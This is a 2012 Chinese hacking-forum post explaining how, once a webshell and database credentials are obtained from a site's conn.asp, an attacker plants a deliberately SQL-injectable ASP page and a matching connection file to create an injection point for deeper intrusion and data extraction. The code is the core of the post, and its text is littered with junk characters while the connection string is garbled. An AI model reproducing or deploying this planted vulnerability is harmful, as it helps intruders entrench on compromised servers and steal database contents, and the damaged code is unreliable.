找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1958|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
( @  n8 v0 i! d' y2 K
0 p; U8 Q: k1 r  V今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息* [/ z, h8 X$ K/ P- T2 ~$ c% D

5 C- V6 {9 x9 T6 h. z  Y# A这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
1 ?; E$ n0 b- T) r. P
3 V' N# @  D1 u! T首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和+ o7 c" K0 f4 C3 e+ J' O4 c

) n" _0 H! }; V1 }5 f) ?4 |; A% U密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表$ I1 I" W  A& t7 [+ {
9 `  ?$ \8 [3 L6 g
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
$ S  J. |! ^  h0 j6 p  ]: X5 P& i. A& Z
程序代码
# l  T" d2 ]& s. ^) M<!--#include file="xx.asp"-->
( R4 s1 \7 `( u- m8 {; [3 ^! T$ \<%
5 H! n, E" R: K! \& Cset rs=server.createobject("ADODB.recordset")
6 D' }" z! t! {: }8 x6 m4 X) [id = request("id")  T; b+ |" J" x& t, i  \
strSQL = "select * from admin where id=" & id  r  ?2 J0 p, k" n7 ?0 H, d- Z
rs.open strSQL,conn,1,3: a7 _" k. t$ s4 R. Z+ q; B
rs.close- o( A* C8 W! v
%>
: S! |9 M! l) k6 U( v" |2 ^) l7 y, i  p: R
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在) F* s' L3 B- D3 j6 c5 ^3 {$ ^
( v0 ]8 n( C+ k: g- I
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!& h3 i6 C" s4 I" \* e

: S# R; t, S& [7 \( r: V然后就要构造一个连接数据库的文件了,代码如下:) q/ g( U( E1 S; B) Y4 a( o' Z! w$ K
程序代码
& [# Z. H+ g" o7 i8 H7 O3 \<%        / _7 z1 v6 R. n5 w  o5 B& `
strSQLServerName = "000.000.000.000"     '服务器名称或地址
  \1 ?1 n  m- u- H: y" `8 YstrSQLDBUserName = "sqlname"         '数据库帐号
( W' [! r( y: O9 ?- T, |# c6 istrSQLDBPassword = "sqlpass"         '数据库密码; Y7 g) I9 k: f3 g8 m" d5 C
strSQLDBName = "sqldataname"           '数据库名称0 L, S- D( B' A8 v/ L
Set conn = Server.CreateObject("ADODB.Connection")
$ Y( U+ x! A4 ~strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"+ T2 s. I' M; P7 j
conn.open strCon5 Q. ]& y% R% h6 Z" u2 U0 q; \1 r
%>
/ \9 A" K3 H& F$ N. r+ Z) B. r8 {: D( q# B8 E# W# k; m4 S
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
- x5 j  _/ E* y$ b3 I7 B
! l4 `: z1 a8 m3 y# I! s就这样,正常情况下,就OK了,伪造成功……
! a% V: J* b& z" A- B
$ Z/ c" x) l4 K% c) u           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表